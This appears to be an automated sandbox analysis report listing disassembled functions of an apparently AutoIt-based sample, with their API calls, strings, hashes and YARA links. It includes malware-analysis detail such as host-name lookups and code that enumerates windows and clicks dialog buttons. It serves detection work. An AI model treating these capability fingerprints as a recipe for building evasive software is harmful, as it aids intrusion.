                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: b2f292063ec535b447d1715dbeb2dec84f9ee2e4c1d9fb0bcdec25028835186b
                                                  • Instruction ID: bfce0169f727fac470b3b3a39e6f1b8d7da84576842bab6a6400ba3229bb716b
                                                  • Opcode Fuzzy Hash: b2f292063ec535b447d1715dbeb2dec84f9ee2e4c1d9fb0bcdec25028835186b
                                                  • Instruction Fuzzy Hash: 89417C7219024A8BDF10EF51D855AEE37A0FF21310F2444A8FD651B292DB70DE9BCBA0
                                                  Function 00C1F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BFE2A0,00000010,?,Bad directive syntax error,00C4F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C1F7C2
                                                  • LoadStringW.USER32(00000000,?,00BFE2A0,00000010), ref: 00C1F7C9
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • _wprintf.LIBCMT ref: 00C1F7FC
                                                  • __swprintf.LIBCMT ref: 00C1F81E
                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C1F88D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                  • API String ID: 1506413516-4153970271
                                                  • Opcode ID: e217a3ccedb96fa687a50f4800a0fa21d99428c4e2bf28e0d9500566ad752184
                                                  • Instruction ID: feb07d4b29631cd2221dbc69cadc20a60c2f77d19293ebab7ebaa74e824b4c59
                                                  • Opcode Fuzzy Hash: e217a3ccedb96fa687a50f4800a0fa21d99428c4e2bf28e0d9500566ad752184
                                                  • Instruction Fuzzy Hash: 13216D3294021AEBCF11EF90CC1AFEE77B9FF19310F0444A9B519660A2EA71A659DB50
                                                  Function 00C252C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                    • Part of subcall function 00BC7924: _memmove.LIBCMT ref: 00BC79AD
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C25330
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C25346
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C25357
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C25369
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C2537A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: 192f2450e5d960b53f70c3dd3de2a1f2deb9b6a13e35a7702aa0e409e879b57c
                                                  • Instruction ID: b0f976067047032b97fdb798ac367901c78e16571a0318b0c49f4d3a4bf14468
                                                  • Opcode Fuzzy Hash: 192f2450e5d960b53f70c3dd3de2a1f2deb9b6a13e35a7702aa0e409e879b57c
                                                  • Instruction Fuzzy Hash: A611BF31AD016979D724F661DC4AEFFBBBCEB91B50F004469B516A20E1EEB01D08C9B0
                                                  Function 00C246B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: 7d9fd508307ebc67eea2128f1a7284923d1669c5aa244a9a877fb3caee16daaa
                                                  • Instruction ID: 797dc7aa3587cf8acfcd7885b2559169492188dc6fdcb4be4575eb191f6f5b12
                                                  • Opcode Fuzzy Hash: 7d9fd508307ebc67eea2128f1a7284923d1669c5aa244a9a877fb3caee16daaa
                                                  • Instruction Fuzzy Hash: D0110635900124AFDB24AB71AC4AFEE77BCEF02B11F0441BAF55996091FF749E82CA50
                                                  Function 00C24F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00C24F7A
                                                    • Part of subcall function 00BE049F: timeGetTime.WINMM(?,7707B400,00BD0E7B), ref: 00BE04A3
                                                  • Sleep.KERNEL32(0000000A), ref: 00C24FA6
                                                  • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C24FCA
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C24FEC
                                                  • SetActiveWindow.USER32 ref: 00C2500B
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C25019
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C25038
                                                  • Sleep.KERNEL32(000000FA), ref: 00C25043
                                                  • IsWindow.USER32 ref: 00C2504F
                                                  • EndDialog.USER32(00000000), ref: 00C25060
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 91acceedaf86f1c4bf5f5b6737b22bbc928aad48fa6c79bede6b6a98499fe46c
                                                  • Instruction ID: 127d971974dc3b95d39651f703bf9c53e18d67875eb6fda997ee1b9b7a672a33
                                                  • Opcode Fuzzy Hash: 91acceedaf86f1c4bf5f5b6737b22bbc928aad48fa6c79bede6b6a98499fe46c
                                                  • Instruction Fuzzy Hash: B921AF78604615FFE7105FB0FD89B2E3BA9FB4A785F041038F505826B1CBB18E529B66
                                                  Function 00C2D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • CoInitialize.OLE32(00000000), ref: 00C2D5EA
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C2D67D
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00C2D691
                                                  • CoCreateInstance.OLE32(00C52D7C,00000000,00000001,00C78C1C,?), ref: 00C2D6DD
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C2D74C
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00C2D7A4
                                                  • _memset.LIBCMT ref: 00C2D7E1
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00C2D81D
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C2D840
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00C2D847
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C2D87E
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00C2D880
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: 0d75a902560e47f84c612ee162bf37cf6065e078f2b9e6d16a4348f18bfef27a
                                                  • Instruction ID: 716994c0f0a8e292cbd7e3a089f6dfa910a1e1e1655d853570cf563759d554dc
                                                  • Opcode Fuzzy Hash: 0d75a902560e47f84c612ee162bf37cf6065e078f2b9e6d16a4348f18bfef27a
                                                  • Instruction Fuzzy Hash: F2B10D75A00119AFDB04DF64D888EAEBBF9FF49314B1484A9F91AEB251DB30ED41CB50
                                                  Function 00C1C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00C1C283
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1C295
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C1C2F3
                                                  • GetDlgItem.USER32(?,00000002), ref: 00C1C2FE
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1C310
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C1C364
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C1C372
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1C383
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C1C3C6
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C1C3D4
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C1C3F1
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C1C3FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: 74936024901562bb58392c3928487577973053be34e57bedf5d0ce5a6763075e
                                                  • Instruction ID: 653412c6ecde972fd9c1b50cc2292f9450456ad0bec9d671b6a906c1584eece0
                                                  • Opcode Fuzzy Hash: 74936024901562bb58392c3928487577973053be34e57bedf5d0ce5a6763075e
                                                  • Instruction Fuzzy Hash: 73515F75B40205AFDB18CFA9DD89BAEBBBAFB89310F14812DF515D72A0D7709E418B10
                                                  Function 00BC201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC2036,?,00000000,?,?,?,?,00BC16CB,00000000,?), ref: 00BC1B9A
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BC20D3
                                                  • KillTimer.USER32(-00000001,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BC216E
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00BFBCA6
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBCD7
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBCEE
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBD0A
                                                  • DeleteObject.GDI32(00000000), ref: 00BFBD1C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 14eb2806efaa236e47bc7145f508519b1c204e51ede235986e89ebfa411be0f3
                                                  • Instruction ID: 549ec5c1443fcc8217e49c975001edf516d3decf1982d17a15c3a64d8b8da877
                                                  • Opcode Fuzzy Hash: 14eb2806efaa236e47bc7145f508519b1c204e51ede235986e89ebfa411be0f3
                                                  • Instruction Fuzzy Hash: F8619C39500A04DFDB359F14C988F2AB7F2FF41312F1484AEE5429B9B0C7B0A895DB95
                                                  Function 00BC21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC
                                                  • GetSysColor.USER32(0000000F), ref: 00BC21D3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 0ad64941ef9104caf63617a271723b67b49dffefa432b6e216953ee5b868f9da
                                                  • Instruction ID: 0c8d1023ad6f2219224914afc9119d8fd66ca966aac59ec50d0b723f2e3c52d9
                                                  • Opcode Fuzzy Hash: 0ad64941ef9104caf63617a271723b67b49dffefa432b6e216953ee5b868f9da
                                                  • Instruction Fuzzy Hash: 5A416F35100544EEDB259F28EC88FBD3BA5EB06331F1942A9FE659E1E5C7718C42DB21
                                                  Function 00C2A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,00C4F910), ref: 00C2A90B
                                                  • GetDriveTypeW.KERNEL32(00000061,00C789A0,00000061), ref: 00C2A9D5
                                                  • _wcscpy.LIBCMT ref: 00C2A9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: cb1034d057650cb89fb1c0dcb6714ba7586f36208d4545d331d178e18f087481
                                                  • Instruction ID: 590692774e71239fad3d05eb922ae04cd237ac2e84c9fa4693ce326f7e3ae560
                                                  • Opcode Fuzzy Hash: cb1034d057650cb89fb1c0dcb6714ba7586f36208d4545d331d178e18f087481
                                                  • Instruction Fuzzy Hash: 2851CB31118311ABC700EF16D892BAFB7E5FF94700F1048ADF5A6572A2DB70DA89CA53
                                                  Function 00BC9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: 51190fb160a3170045eafd4aa0da67cec596590b781e8fcb9a9180f935d17526
                                                  • Instruction ID: 556c9cea673eae967d0c5e1b90fc240118808a923ddac70fa9541b1d8134799d
                                                  • Opcode Fuzzy Hash: 51190fb160a3170045eafd4aa0da67cec596590b781e8fcb9a9180f935d17526
                                                  • Instruction Fuzzy Hash: FC41E47151420AAFEB24EF35DC8AF7A73E8EF05340F2044FEE649D7291EA7199458B11
                                                  Function 00C47152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C4716A
                                                  • CreateMenu.USER32 ref: 00C47185
                                                  • SetMenu.USER32(?,00000000), ref: 00C47194
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C47221
                                                  • IsMenu.USER32(?), ref: 00C47237
                                                  • CreatePopupMenu.USER32 ref: 00C47241
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C4726E
                                                  • DrawMenuBar.USER32 ref: 00C47276
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: 439ef02257645a166ad4a6d922b4ed487ddb1f4af41e8bdf3376b8135a5f247b
                                                  • Instruction ID: 4bc54e966e412470a8768cb2fa9cc26274fe9b273a9086783dffaecce47be913
                                                  • Opcode Fuzzy Hash: 439ef02257645a166ad4a6d922b4ed487ddb1f4af41e8bdf3376b8135a5f247b
                                                  • Instruction Fuzzy Hash: C6416578A01209EFDB20DFA4D884F9ABBF5FF09310F144629F915A7361D771AA10CBA0
                                                  Function 00C474BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C4755E
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00C47565
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C47578
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C47580
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C4758B
                                                  • DeleteDC.GDI32(00000000), ref: 00C47594
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00C4759E
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C475B2
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C475BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: f73df3956c69630d9efd9215a484914692fde0f1b94df0b532536d80eafbbe48
                                                  • Instruction ID: bdf84dee7af324381f3ac1a7e4637fea17ab6df0de0eaa4b708cd0328fe1fb2c
                                                  • Opcode Fuzzy Hash: f73df3956c69630d9efd9215a484914692fde0f1b94df0b532536d80eafbbe48
                                                  • Instruction Fuzzy Hash: A9314936105214ABDF119F64DC08FEA3B69FF0A360F110229FA25A60A0C731D912DBA4
                                                  Function 00BE6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BE6E3E
                                                    • Part of subcall function 00BE8B28: __getptd_noexit.LIBCMT ref: 00BE8B28
                                                  • __gmtime64_s.LIBCMT ref: 00BE6ED7
                                                  • __gmtime64_s.LIBCMT ref: 00BE6F0D
                                                  • __gmtime64_s.LIBCMT ref: 00BE6F2A
                                                  • __allrem.LIBCMT ref: 00BE6F80
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE6F9C
                                                  • __allrem.LIBCMT ref: 00BE6FB3
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE6FD1
                                                  • __allrem.LIBCMT ref: 00BE6FE8
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE7006
                                                  • __invoke_watson.LIBCMT ref: 00BE7077
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
